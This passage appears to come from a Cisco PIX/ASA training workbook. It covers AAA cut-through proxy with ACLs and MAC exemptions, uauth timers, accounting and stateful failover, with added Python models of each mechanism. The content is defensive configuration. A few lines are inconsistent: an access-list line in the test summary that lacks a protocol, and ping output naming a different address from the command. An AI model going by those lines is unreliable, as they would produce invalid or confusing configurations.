(config)# aaa authentication include telnet outside 0 0 0 0 SERVERTAG

which defines that all Telnet connections will be authenticated against user credentials. If
a more selective match is required, an extended ACL can be used to determine the traffic to
be authenticated. For example:
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST inside SERVERTAG

which authenticates all traffic arriving on the inside interface from 192.168.0.0/24, and
also all FTP and HTTP connections on that interface. A deny entry in the ACL excludes the
matching traffic from authentication, and, as with the include form, only Telnet, FTP, HTTP
and HTTPS connections can actually prompt the user, so the first entry above only takes
effect for hosts that already hold a cached authentication. In this case SERVERTAG is the
tag that names the authentication server group, such as:
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4

Objectives
The objectives of this challenge are to:

Define an end-user cut-through proxy for various protocols.
Define ACLs for interesting traffic to be authenticated.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST newyork SERVERTAG

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa ?
configure mode commands/options:
  accounting      Configure user accounting parameters
  authentication  Configure user authentication parameters
  authorization   Configure user authorization parameters
  local           AAA Local method options
  mac-exempt      Configure MAC Exempt parameters
  proxy-limit     Configure number of concurrent proxy connections allowed per
                  user
(config)# aaa authentication ?
configure mode commands/options:
  command  Specify this keyword to allow command authorization to be configured
           for all administrators on all consoles
  exclude  Exclude the service, local and foreign network which needs to be
           authenticated, authorized, and accounted
  include  Include the service, local and foreign network which needs to be
           authenticated, authorized, and accounted
  match    Specify this keyword to configure an ACL to match
(config)# aaa authentication match ?
configure mode commands/options:
  WORD  Name of configured access-list to match
(config)# aaa authentication match TEST ?
configure mode commands/options:
Current available interface(s):
  newyork  Name of interface Ethernet0
(config)# aaa authentication match TEST newyork ?
configure mode commands/options:
  LOCAL  Predefined server tag for AAA protocol 'local'
  WORD   Specify name of server group defined by the aaa-server command.
(config)# aaa authentication match TEST newyork SERVERTAG

Cisco PIX/ASA Challenge 141


Title: AAA for End-user Cut-through Proxy Applications using an ACL, with a MAC-list
for exemptions
Outline
In the previous challenge an ACL was used to define the traffic to be authenticated, such as:
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST inside SERVERTAG

HTTP authentication prompts can be forced over SSL, so that the username and password are
not sent in cleartext, with:
(config)# aaa authentication secure-http-client

This protects only the HTTP login exchange; Telnet and FTP prompts still carry credentials in
the clear. Along with this, devices such as IP phones or printers that cannot answer an
authentication prompt can be exempted with a MAC-list, such as:
(config)# mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
(config)# mac-list MACLIST permit 00c0.0000.0002 ffff.ffff.ffff

which allows the devices with the MAC addresses 00c0.0000.0001 and 00c0.0000.0002 to pass
through without authentication. The second argument is a mask: ffff.ffff.ffff requires an
exact match, while a mask such as ffff.ff00.0000 matches every address with that OUI. The
list is then applied with:
(config)# aaa mac-exempt match MACLIST

Entries are evaluated in order and the first match wins; a deny entry forces authentication
for the matching address. Because a source MAC address is only visible on the segment
directly attached to the PIX/ASA and is trivially spoofed, a MAC exemption is a convenience
for devices on the local segment, not an access control.
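The following Python model (an added example; not NetworkSims or Cisco code) implements the decision the sections above describe: the MAC list is consulted first, then the ACL named in aaa authentication match, with first-match semantics in both. It parses the page's own mac-list and access-list lines (with the network entry written in extended form, permit ip ... any) plus one constructed OUI-wide exemption, and shows how the mask decides what an entry matches. The order mac-exempt before ACL, and the treatment of an ACL deny as "do not authenticate", are the assumptions being modelled.

```python
"""Model of the PIX/ASA cut-through-proxy decision for one flow: the
aaa mac-exempt list is consulted first, then the ACL named in
'aaa authentication match'. Added example; not NetworkSims or Cisco code.
Assumed: first match wins in both lists, an ACL deny means 'do not
authenticate', and MAC exemption is checked before the ACL."""
import ipaddress

PORTS = {"ftp": 21, "http": 80, "https": 443, "telnet": 23, "ssh": 22}


def mac_int(h: str) -> int:
    """'00c0.0000.0001' -> integer."""
    return int(h.replace(".", ""), 16)


def parse_mac_list(lines):
    """mac-list NAME permit|deny H.H.H H.H.H  ->  [(action, addr, mask)]"""
    out = []
    for ln in lines:
        p = ln.split()
        if len(p) == 5 and p[0] == "mac-list":
            out.append((p[2], mac_int(p[3]), mac_int(p[4])))
    return out


def mac_exempt(entries, mac: str) -> bool:
    """True if the first entry whose masked bits match is a permit."""
    m = mac_int(mac)
    for action, addr, mask in entries:
        if (m & mask) == (addr & mask):
            return action == "permit"
    return False


def _net(tokens, i):
    """Consume 'any' or 'A.B.C.D MASK' at index i; return (network, next i)."""
    if tokens[i] == "any":
        return ipaddress.ip_network("0.0.0.0/0"), i + 1
    return ipaddress.ip_network(f"{tokens[i]}/{tokens[i + 1]}"), i + 2


def parse_acl(lines):
    """access-list NAME permit|deny ip|tcp|udp SRC DST [eq PORT]"""
    out = []
    for ln in lines:
        t = ln.split()
        if len(t) < 6 or t[0] != "access-list":
            continue
        src, i = _net(t, 4)
        dst, i = _net(t, i)
        port = None
        if i < len(t) and t[i] == "eq":
            port = PORTS.get(t[i + 1]) or int(t[i + 1])
        out.append((t[2], t[3], src, dst, port))
    return out


def acl_lookup(aces, proto, src, dst, dport):
    """'permit', 'deny', or None when no entry matches (implicit deny)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for action, p, sn, dn, port in aces:
        if p != "ip" and p != proto:
            continue
        if s not in sn or d not in dn:
            continue
        if port is not None and port != dport:
            continue
        return action
    return None


def decide(mac_entries, aces, src_mac, proto, src, dst, dport):
    """'exempt' (MAC list), 'authenticate' (ACL permit) or 'pass' (no AAA)."""
    if mac_exempt(mac_entries, src_mac):
        return "exempt"
    if acl_lookup(aces, proto, src, dst, dport) == "permit":
        return "authenticate"
    return "pass"


# Constructed sample config: the page's entries plus one OUI-wide exemption.
CONFIG = """
access-list TEST permit ip 192.168.0.0 255.255.255.0 any
access-list TEST permit tcp any any eq ftp
access-list TEST permit tcp any any eq http
mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
mac-list MACLIST permit 00c0.0000.0002 ffff.ffff.ffff
mac-list MACLIST permit 0011.2200.0000 ffff.ff00.0000
""".strip().splitlines()
MACS, ACES = parse_mac_list(CONFIG), parse_acl(CONFIG)

if __name__ == "__main__":
    for flow in [("00c0.0000.0001", "tcp", "10.0.0.5", "10.9.9.9", 80),     # exempt
                 ("0011.22ab.cdef", "udp", "10.0.0.6", "10.9.9.9", 53),     # exempt (OUI)
                 ("00c0.0000.0009", "tcp", "192.168.0.7", "10.9.9.9", 25),  # authenticate
                 ("00c0.0000.0009", "tcp", "10.0.0.5", "10.9.9.9", 80),     # authenticate
                 ("00c0.0000.0009", "udp", "10.0.0.5", "10.9.9.9", 53)]:    # pass
        print(flow, "->", decide(MACS, ACES, *flow))
```

The OUI entry shows why masks need care: ffff.ff00.0000 exempts every device from that vendor, and anyone who sets their adapter to a matching address is exempt as well.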

Objectives
The objectives of this challenge are to:

Define an end-user cut-through proxy for various protocols.
Define ACLs for interesting traffic to be authenticated.
Define AAA host details.
Define a MAC-list for exempted devices.
Apply the MAC-list.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication secure-http-client
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST newyork SERVERTAG
(config)# mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
(config)# mac-list MACLIST permit 00c0.0000.0002 ffff.ffff.ffff
(config)# aaa mac-exempt match MACLIST

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication secure-http-client
(config)# access-list TEST permit ip 192.168.0.0 255.255.255.0 any
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST newyork SERVERTAG
(config)# mac-list ?
configure mode commands/options:
  WORD  Mac list identifier
(config)# mac-list MACLIST ?
configure mode commands/options:
  deny    Specify packets to reject
  permit  Specify packets to forward
(config)# mac-list MACLIST permit ?
configure mode commands/options:
  H.H.H  Match based on source MAC address
(config)# mac-list MACLIST permit 00c0.0000.0001 ?
configure mode commands/options:
  H.H.H  Mac mask
(config)# mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
(config)# mac-list MACLIST permit 00c0.0000.0002 ffff.ffff.ffff
(config)# aaa mac-exempt ?
configure mode commands/options:
  match  Specify this keyword to configure a mac-list to match
(config)# aaa mac-exempt match ?
configure mode commands/options:
  WORD  Name of configured mac-list to match
(config)# aaa mac-exempt match MACLIST ?
configure mode commands/options:
  <cr>
(config)# aaa mac-exempt match MACLIST

Cisco PIX/ASA Challenge 142


Title: Using AAA for End-user Cut-through Proxy Applications with a limit on per-user
proxy connections, and a timeout for inactivity.
Outline
The maximum number of concurrent proxy connections per user is defined with:
(config)# aaa proxy-limit 50

which allows 50 active proxy connections for each user. The maximum that can be set is 128
and the default is 16. Also the timeout for inactivity after a successful authentication is
defined with:
(config)# timeout uauth 00:30:00 inactivity

which removes a cached authentication once the user has been idle for 30 minutes. The
absolute timer, which runs from the moment of authentication regardless of activity, keeps
its default of 0:05:00 unless it is set separately (for example timeout uauth 1:00:00
absolute); with the default, the cache entry expires after five minutes whatever the
inactivity value, as the show uauth output below illustrates. The cache is keyed on the
source IP address, so where several users share an address (NAT, a terminal server) one
user's authentication is reused by the others until it times out.
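The interaction between the two uauth timers and the proxy limit is easy to get wrong, so here is a small Python simulation (an added example, not NetworkSims or Cisco code) of the cache semantics the help text describes: an absolute timer counted from authentication, an inactivity timer restarted by each new connection, and a per-user connection cap. Connections never close in the model, and the defaults (0:05:00 absolute, proxy-limit 16) are taken from the help output on this page; the source address, username and timings are constructed.

```python
"""Simulation of the PIX/ASA uauth cache: an absolute timer counted from
authentication, an inactivity timer restarted by each new connection, and
the per-user proxy-limit. Added example; not NetworkSims or Cisco code.
Defaults (0:05:00 absolute, proxy-limit 16) follow the help text on this
page; connections never close in this simplified model."""
from dataclasses import dataclass, field


def hms(s: str) -> int:
    """'0:30:00' (the timeout uauth format) -> seconds."""
    h, m, sec = (int(x) for x in s.split(":"))
    return h * 3600 + m * 60 + sec


@dataclass
class UauthEntry:
    user: str
    authenticated_at: int       # when the absolute timer started
    last_activity: int          # when the inactivity timer last restarted
    open_conns: int = 0


@dataclass
class UauthCache:
    absolute: int = hms("0:05:00")      # default, always running
    inactivity: int = 0                 # 0 = no inactivity timer configured
    proxy_limit: int = 16               # default from 'aaa proxy-limit ?'
    entries: dict = field(default_factory=dict)   # keyed by source IP

    def authenticate(self, ip: str, user: str, now: int) -> None:
        """Successful AAA exchange: cache the user against the source IP."""
        self.entries[ip] = UauthEntry(user, now, now)

    def is_cached(self, ip: str, now: int) -> bool:
        """Both timers are checked; whichever expires first evicts the entry."""
        e = self.entries.get(ip)
        if e is None:
            return False
        if now - e.authenticated_at >= self.absolute:
            return self._expire(ip)
        if self.inactivity and now - e.last_activity >= self.inactivity:
            return self._expire(ip)
        return True

    def _expire(self, ip: str) -> bool:
        del self.entries[ip]
        return False

    def new_connection(self, ip: str, now: int) -> str:
        """'cached' if the flow rides an existing entry, 'prompt' if the user
        must (re)authenticate, 'limit' if aaa proxy-limit would be exceeded."""
        if not self.is_cached(ip, now):
            return "prompt"
        e = self.entries[ip]
        if e.open_conns >= self.proxy_limit:
            return "limit"
        e.open_conns += 1
        e.last_activity = now
        return "cached"


def scenario() -> dict:
    """Walk through the page's settings and a corrected variant."""
    r = {}
    # As configured above: inactivity 0:30:00, proxy-limit 50, absolute left at 0:05:00.
    c = UauthCache(inactivity=hms("0:30:00"), proxy_limit=50)
    c.authenticate("192.168.0.1", "fred", now=0)
    r["a_t60"] = c.new_connection("192.168.0.1", 60)       # cached
    r["a_t299"] = c.new_connection("192.168.0.1", 299)     # cached
    r["a_t300"] = c.new_connection("192.168.0.1", 300)     # prompt: absolute timer hit
    # With the absolute timer raised, the inactivity timer governs; a small
    # proxy-limit shows the cap.
    c2 = UauthCache(absolute=hms("1:00:00"), inactivity=hms("0:30:00"), proxy_limit=2)
    c2.authenticate("192.168.0.1", "fred", now=0)
    r["b_t10"] = c2.new_connection("192.168.0.1", 10)      # cached (1 open)
    r["b_t20"] = c2.new_connection("192.168.0.1", 20)      # cached (2 open)
    r["b_t30"] = c2.new_connection("192.168.0.1", 30)      # limit
    r["b_t1830"] = c2.new_connection("192.168.0.1", 1830)  # prompt: idle 30 min since t=20
    return r


if __name__ == "__main__":
    for step, outcome in scenario().items():
        print(step, outcome)
```

The first run reproduces what the show uauth output further down shows: with absolute still at 0:05:00, the 30-minute inactivity setting never gets a chance to matter.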


Objectives
The objectives of this challenge are to:

Define an end-user cut-through proxy for various protocols.
Define AAA host details.
Define a limit on per-user proxy connections.
Define a timeout for inactivity.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include http newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include https newyork 0 0 0 0 SERVERTAG
(config)# aaa proxy-limit 50
(config)# timeout uauth 00:30:00 inactivity
(config)# exit
# show uauth

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa authentication include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include http newyork 0 0 0 0 SERVERTAG
(config)# aaa authentication include https newyork 0 0 0 0 SERVERTAG
(config)# aaa proxy-limit ?
configure mode commands/options:
  <1-128>  Number of concurrent proxy connections allowed per user (1 - 128),
           default is 16
  disable  Disable concurrent proxy connections
(config)# aaa proxy-limit 50
(config)# timeout ?
configure mode commands/options:
  conn         Configure idle time after which a TCP connection state
               will be closed, default is 1:00:00
  h225         Configure idle time after which an H.225 signaling conn
               will be closed, default is 1:00:00
  h323         Configure idle time after which an H.323 control connection
               will be closed, default is 0:05:00
  half-closed  Configure idle time after which a TCP half-closed connection
               will be freed, default is 0:10:00
  icmp         Configure idle timeout for ICMP, default is 0:00:02
  mgcp         Configure idle time after which an MGCP media connection
               will be closed, default is 0:05:00
  mgcp-pat     Configure the time after which an MGCP PAT Xlate
               will be removed, default is 0:05:00
  sip          Configure idle time after which a SIP control connection
               will be closed, default is 0:30:00
  sip_media    Configure idle time after which a SIP Media connection
               will be closed, default is 0:02:00
  sunrpc       Configure idle time after which a SUNRPC slot
               will be closed, default is 0:10:00
  uauth        Configure idle time after which an authentication will no
               longer be cached and the user will need to re-authenticate on
               their connection, default is 0:05:00. The default uauth timer
               is absolute.
  udp          Configure idle time after which general UDP states
               will be closed, default is 0:02:00, This timer does not
               apply to DNS or SUNRPC
  xlate        Configure idle time after which a dynamic address
               will be returned to the free pool, default is 3:00:00
(config)# timeout uauth ?
configure mode commands/options:
  <0:0:0> - <1193:0:0>  Idle time after which an authentication will no longer
                        be cached and the user will need to re-authenticate on
                        their connection, default is 0:05:00. The default uauth
                        timer is absolute.
(config)# timeout uauth 00:30:00 ?
configure mode commands/options:
  absolute        Run uauth timer continuously, the default uauth timer is
                  absolute
  conn            Configure idle time after which a TCP connection state will
                  be closed, default is 1:00:00
  h225            Configure idle time after which an H.225 signaling conn will
                  be closed, default is 1:00:00
  h323            Configure idle time after which an H.323 control connection
                  will be closed, default is 0:05:00
  half-closed     Configure idle time after which a TCP half-closed connection
                  will be freed, default is 0:10:00
  icmp            Configure idle timeout for ICMP, default is 0:00:02
  inactivity      Start uauth timer after a connection becomes idle
  mgcp            Configure idle time after which an MGCP media connection will
                  be closed, default is 0:05:00
  mgcp-pat        Configure the time after which an MGCP PAT Xlate will be
                  removed, default is 0:05:00
  sip             Configure idle time after which a SIP control connection will
                  be closed, default is 0:30:00
  sip-disconnect  Configure idle timeout after which SIP session is deleted if
                  200 OK is not received for a CANCEL or BYE message, default is
                  0:02:00
  sip-invite      Configure idle time after which pinholes for PROVISIONAL
                  responses and media xlates will be closed, default is 0:03:00
  sip_media       Configure idle time after which a SIP Media connection will
                  be closed, default is 0:02:00
  sunrpc          Configure idle time after which a SUNRPC slot will be closed,
                  default is 0:10:00
  udp             Configure idle time after which general UDP states will be
                  closed, default is 0:02:00, This timer does not apply to DNS
                  or SUNRPC
  xlate           Configure idle time after which a dynamic address will be
                  returned to the free pool, default is 3:00:00
  <cr>
(config)# timeout uauth 00:30:00 inactivity
(config)# exit
# show uauth
                        Current    Most Seen
Authenticated Users       1            1
Authen In Progress        0            1
user 'fred' at 192.168.0.1, authorized to:
   port 192.168.0.1/telnet
   absolute   timeout: 0:05:00
   inactivity timeout: 0:30:00
# sh ua ?
  WORD  User name
  |     Output modifiers
  <cr>
# sh uauth fred
                        Current    Most Seen
Authenticated Users       0            0
Authen In Progress        0            0

Cisco PIX/ASA Challenge 143


Title: Using AAA Accounting
Outline
The PIX/ASA can generate accounting records for connections that pass through it. To define
the traffic to be accounted:
(config)# aaa accounting include telnet outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include ssh outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include ftp outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include http outside 0 0 0 0 SERVERTAG
(config)# aaa accounting include https outside 0 0 0 0 SERVERTAG

which accounts for all Telnet, SSH, FTP, HTTP and HTTPS connections arriving on the outside
interface, for all local and foreign addresses (where 0 is the same as 0.0.0.0). Accounting
records carry the authenticated username when the source host holds a cached authentication
(uauth), so accounting is normally paired with the authentication commands of the previous
challenges. In this case SERVERTAG is the tag that names the accounting server group, which
for RADIUS must accept requests on its accounting port (accounting-port), such as:
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4

Objectives
The objectives of this challenge are to:

Define accounting traffic.
Define AAA host details.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa accounting include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include http newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include https newyork 0 0 0 0 SERVERTAG

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0
(config-if)# nameif newyork
(config-if)# exit
(config)# aaa-server SERVERTAG protocol radius
(config-aaa-server-group)# exit
(config)# aaa-server SERVERTAG (newyork) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit
(config)# aaa accounting include telnet newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include ssh newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include ftp newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include http newyork 0 0 0 0 SERVERTAG
(config)# aaa accounting include https newyork 0 0 0 0 SERVERTAG

Cisco PIX/ASA Test (Challenge 144)


Outline
This challenge involves taking a PIX/ASA test on local users and AAA. The main facts are:

Cisco IOS has 16 different privilege levels, 0 to 15.
Level 15 is the highest privilege and 0 is the lowest.
show privilege is used to display the current privilege level.
Privileged EXEC mode is Level 15.
EXEC mode is Level 1.

Key commands
Local authentication:
(config)# aaa-server MYLOCAL protocol local
(config-aaa-server-group)# exit
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL
(config)# aaa authentication enable console MYLOCAL

RADIUS authentication:
(config)# aaa-server TEST protocol radius
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit
(config)# aaa-server TEST (inside) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# authentication-port 1645
(config-aaa-server-host)# accounting-port 1646

(config-aaa-server-host)# retry-interval 10
(config-aaa-server-host)# exit

Tacacs+ authentication:
(config)# aaa-server TEST protocol tacacs+
(config-aaa-server-group)# max-failed-attempts 5
(config-aaa-server-group)# reactivation-mode depletion deadtime 10
(config-aaa-server-group)# exit
(config)# aaa-server TEST (inside) host 1.2.3.4
(config-aaa-server-host)# key testkey
(config-aaa-server-host)# exit

End-User Cut-Through Proxy:
(config)# aaa authentication include telnet outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ssh outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include ftp outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include http outside 0 0 0 0 SERVERTAG
(config)# aaa authentication include https outside 0 0 0 0 SERVERTAG
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4

Where 0 identifies 0.0.0.0.


End-User Cut-Through Proxy with ACL:
(config)# access-list TEST permit 192.168.0.0 255.255.255.0
(config)# access-list TEST permit tcp any any eq ftp
(config)# access-list TEST permit tcp any any eq http
(config)# aaa authentication match TEST inside SERVERTAG
(config)# aaa-server SERVERTAG (inside) host 1.2.3.4

End-User Cut-Through Proxy with ACL and exempting some devices:
(config)# mac-list MACLIST permit 00c0.0000.0001 ffff.ffff.ffff
(config)# mac-list MACLIST permit 00c0.0000.0002 ffff.ffff.ffff
(config)# aaa mac-exempt match MACLIST

Define a limit to per-user proxy connections:
(config)# aaa proxy-limit 50

Define an inactivity time:
(config)# timeout uauth 00:30:00 inactivity

Cisco PIX/ASA Challenge 145


Title: Stateful Failover (Cable-based Active/Standby Failover)
Outline
The PIX 500 supports cable-based failover (stateful failover). With stateful failover the
secondary device keeps track of all the states of the primary firewall, and thus the
secondary can seamlessly take over from the primary.

Initially the failover cable connects between the PIX devices (primary and secondary). The
cable end marked "Primary" is connected to the primary unit, and the other end to the
secondary unit.
The IP address of an interface and its standby address can be defined with:
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
(config-if)# no shutdown
(config)# int e1
(config-if)# ip address 192.168.1.1 255.255.255.0 standby 192.168.1.2
(config-if)# no shutdown

Next the stateful failover is configured on the Stateful Failover link, such as:
(config)# failover link inf2 e2

in this case inf2 is the name assigned to the physical interface (e2), which will be used for
the failover link. Next an IP address and standby address for the Stateful Failover link can be assigned:
(config)# int e2
(config-if)# no shutdown
(config)# failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2

And then to enable failover:
(config)# failover
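An added example, not from the challenge itself, that parses the commands above and checks the failover pairing: each standby address must lie in the subnet of its active address and differ from it, each failover link must be given an address, and failover must be enabled. The sample configuration is constructed, with the e1 standby address deliberately placed in the wrong subnet so the check fires.

```python
import ipaddress
import re

# Constructed sample following the challenge commands. The e1 standby address
# (192.168.2.2) is deliberately outside 192.168.1.0/24 to show the check firing.
SAMPLE_CONFIG = """
int e0
 ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
 no shutdown
int e1
 ip address 192.168.1.1 255.255.255.0 standby 192.168.2.2
 no shutdown
int e2
 no shutdown
failover link inf2 e2
failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2
failover
"""

# ip address <active> <mask> standby <standby>   (inside an interface block)
IP_RE = re.compile(r"^ip address (\S+) (\S+) standby (\S+)$")
# failover interface ip <link_name> <active> <mask> standby <standby>
FO_IP_RE = re.compile(r"^failover interface ip (\S+) (\S+) (\S+) standby (\S+)$")


def parse_failover(config: str):
    """Return (interfaces, links, enabled).

    interfaces: {name: (active, mask, standby)} for each data interface and for
                each failover link that was given an address
    links:      {link_name: physical_interface} from the failover link commands
    enabled:    True when the bare 'failover' command is present
    """
    interfaces, links, enabled = {}, {}, False
    current = None
    for raw in config.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("int "):
            current = line.split()[1]
        elif (m := IP_RE.match(line)) and current:
            interfaces[current] = m.groups()
        elif line.startswith("failover link "):
            _, _, name, phys = line.split()
            links[name] = phys
        elif (m := FO_IP_RE.match(line)):
            name, active, mask, standby = m.groups()
            interfaces[name] = (active, mask, standby)
        elif line == "failover":
            enabled = True
    return interfaces, links, enabled


def check_failover(config: str):
    """Return a list of problems; an empty list means the pairing is consistent."""
    interfaces, links, enabled = parse_failover(config)
    problems = []
    for name, (active, mask, standby) in interfaces.items():
        net = ipaddress.ip_network(f"{active}/{mask}", strict=False)
        if ipaddress.ip_address(standby) not in net:
            problems.append(f"{name}: standby {standby} not in {net}")
        elif active == standby:
            problems.append(f"{name}: standby equals active address {active}")
    for link in links:
        if link not in interfaces:
            problems.append(f"failover link {link}: no failover interface ip assigned")
    if not enabled:
        problems.append("failover not enabled")
    return problems
```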

Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.

Commands
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# ip address 192.168.1.1 255.255.255.0 standby 192.168.1.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# no shutdown
(config-if)# exit
(config)# failover link inf2 e2
(config)# failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2
(config)# failover

Example
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# ip address 192.168.1.1 255.255.255.0 standby 192.168.1.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# no shutdown
(config-if)# exit
(config)# failover link inf2 e2
(config)# failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2
(config)# failover

Cisco PIX/ASA Test (Challenge 146)


Outline
This challenge involves taking a PIX/ASA test on failover.
Key commands
Stateful Failover (Cable-based Active/Standby Failover)
(config)# int e0
(config-if)# ip address 192.168.0.1 255.255.255.0 standby 192.168.0.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e1
(config-if)# ip address 192.168.1.1 255.255.255.0 standby 192.168.1.2
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# no shutdown
(config-if)# exit
(config)# failover link inf2 e2
(config)# failover interface ip inf2 192.168.2.1 255.255.255.0 standby 192.168.2.2
(config)# failover

Where E2 is used as the failover link, and the standby addresses for E0 and E1 are
192.168.0.2 and 192.168.1.2, respectively.

15 Windows/UNIX host
Windows Challenge 1
Outline
This challenge involves the configuration of network properties for Windows.

Objectives
The objectives of this challenge are to:

Set the IP address.
Set the subnet mask.
Set the gateway.
Set the DNS server.

Example
> ping 192.168.0.1

Pinging 192.168.0.10 with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.168.0.10:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

(set up the Windows interface)
> ping 192.168.0.1

Pinging 192.168.0.1 with 32 bytes of data:

Reply from 192.168.0.1: bytes=32 time=3ms TTL=64
Reply from 192.168.0.1: bytes=32 time=1ms TTL=64
Reply from 192.168.0.1: bytes=32 time=1ms TTL=64
Reply from 192.168.0.1: bytes=32 time=1ms TTL=64

Ping statistics for 192.168.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 3ms, Average = 1ms
> ipconfig

Windows IP Configuration

Ethernet adapter Wireless Network Connection 4:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.3
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
